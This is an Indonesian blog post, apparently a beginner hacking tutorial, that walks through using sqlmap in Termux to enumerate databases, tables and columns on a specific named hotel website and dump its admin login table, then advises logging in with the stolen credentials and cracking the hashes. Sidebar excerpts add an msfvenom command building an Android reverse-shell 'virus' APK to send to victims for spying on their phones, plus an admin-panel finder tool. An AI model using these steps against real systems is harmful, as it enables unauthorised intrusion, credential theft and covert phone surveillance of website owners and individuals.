Langsung ke konten utama

Cara mengetahui user dan password website menggunakan Sqlmap di Termux





Halo sobat.
Kali ini saya akan memberikan tutorial cara mendapatkan username dan password sebuah website menggunakan Sqlmap di Termux.
Jika kalian belum memiliki korban/website yang Vuln untuk di inject,silahkan anda menuju cara mencari website Vuln menggunakan Termux.

Siapkan alat tempur Termux nya.
Lalu jalankan tools Sqlmap.
Jika kamu belum install tool Sqlmap nya,silahkan menuju Cara install Sqlmap di Termux.
Jika sudah install,silahkan langsung
ketik perintah:

cd sqlmap
python2 sqlmap.py

Jika sudah,tampilan nya akan seperti gambar dibawah:



Setelah itu.
Ketik perintah:




python2 sqlmap.py -u http://website_korban.com/index.php?id=1 ---dbs

Contoh:

python2 sqlmap.py -u https://www.hotelmetdelhi.com/pages.php\?id\=77 --dbs

Lalu tekan Enter.

Gambar:

Perintah diatas adalah untuk mendapatkan nama Database website tersebut.
-u adalah untuk URL website dan --dbs adalah untuk mendapatkan Database nya.

Tunggu hingga proses selesai dan mendapatkan nama Database website nya.

Jika proses selesai dan kita mendapatkan nama Database nya.
Tampilan nya akan seperti gambar dibawah ini:


Setelah mendapat nama Database,sekarang kita mencari tabel yang terdapat pada database tersebut.

Ketik perintah:

python2 sqlmap.py -u https://www.hotelmetdelhi.com/pages.php\?id\=77 -D nama_database --tables

Contoh:

python2 sqlmap.py -u https://www.hotelmetdelhi.com/pages.php\?id\=77 -D dbch13_HM --tables

Lalu tekan Enter.

Perintah diatas adalah untuk mendapatkan tabel-tabel yang terdapat pada database dbch13_HM.

--tables adalah perintah untuk mendapatkan tabel pada database.
Jika kita mendapatkan tabel nya.
Tampilannya seperti gambar dibawah:


Gambar diatas menunjukkan nama-nama tabel yang terdapat pada database.

Selanjutnya kita akan menggunakan perintah --columns untuk mendapatkan data pada tabel.
Diatas kita sudah mendapatkan tabel admin yang berisi data login admin ke website nya.
Mari kita lanjutkan membuka tabel yg kita inginkan.

Disini saya akan membuka tabel yp_admin untuk mendapatkan data login admin seperti username dan password nya.

Ketik perintah:

python2 sqlmap.py -u https://www.hotelmetdelhi.com/pages.php\?id\=77 -D dbch13_HM -T yp_admin --columns

Lalu Enter.

Jika kita mendapatkan colom pada tabel nya, tampilannya seperti gambar dibawah ini.

Diatas adalah kolom yang terdapat pada tabel yp_admin.

Untuk mendapatkan username dan password yg terdapat pada kolom,kita tinggal mengetikkan perintah:

python2 sqlmap.py -u https://www.hotelmetdelhi.com/pages.php\?id\=77 -D dbch13_HM -T yp_admin -C admin_id,password --dump

Lalu Enter.

--dump adalah perintah untuk mendapatkan data yang terdapat pada kolom tersebut,seperti username dan password.




Jika proses selesai, penampakan nya akan seperti ini.


Kita telah mengetahui username dan password website tersebut,dan kita tinggal login menggunakan data yang kita dapatkan.

Biasanya password yang kita dapatkan masih di HASH.
untuk crack hash sobat bisa cari di Google.

Sekian tutorial kali ini.
Semoga bermanfaat.
Terima kasih.😊
Label:

Komentar

Posting Komentar

Postingan populer dari blog ini

Cara Menggunakan Metasploit di Termux

Metasploit adalah tools untuk menyadap hp seseorang. Dengan tool ini kita dapat melihat isi SMS,log panggilan, screenshot gambar,merekam suara dan banyak lagi. Untuk cara menggunakan nya sangat mudah  Disini saya akan menjelaskan secara rinci tentang bagaimana cara menggunakan tool Metasploit. Syaratnya kamu harus sudah menginstal aplikasi Termuda,dan menginstal tool Metasploit di termux kamu. Jika belum silahkan download Termux di Play Store. Jika kalian sudah install Termux nya tetapi belum menginstal tool Metasploit, silahkan lihat tutorial cara install Metasploit di Termux. Jika Syarat nya sudah lengkap mari kita lanjutkan. Buka aplikasi Termux kamu. Pertama kita akan membuat payload/backdoor atau virus yang kita gunakan untuk dirimkan ke korban agar dapat akses ke HP nya. Silahkan ketik:  msfvenom -p android/meterpreter/reverse_tcp LHOST= IP Kamu LPORT=8080 -o /sdcard/virus.apk Lalu yang ditanda hijau isikan IP Address HP kamu. ...
20 komentar
Baca selengkapnya

Cara install tools Admin Finder di Termux

Admin Finder adalah tools untuk mengetahui atau mencari lokasi login admin website. Soalnya saya pernah mendapatkan password dan username sebuah website,dan pada saat ingin login dan mencari tempat login nya ga nemu-nemu. Dan setelah mencari tau,akhirnya saya pun berjumpa dengan tools Admin Finder ini,dan sangat membantu sekali. Buat kalian yang susah nemuin login admin nya,pake aja tools ini. Mari kita install tools Admin Finder nya. Buka aplikasi Termux. Lalu ketikkan perintah: apt update && apt upgrade pkg install python2 pkg install php pkg install git git clone https://github.com/mdpunk/admin-finder Jika sudah terinstall,ketikkan perintah  cd admin-finder chmod +x adfin.php php adfin.php Tampilannya seperti gambar dibawah ini: Tinggal ketik url website yang ingin kalian tahu login admin nya. Sekian tutorial kali ini. Semoga bermanfaat dan terimakasih.
Posting Komentar
Baca selengkapnya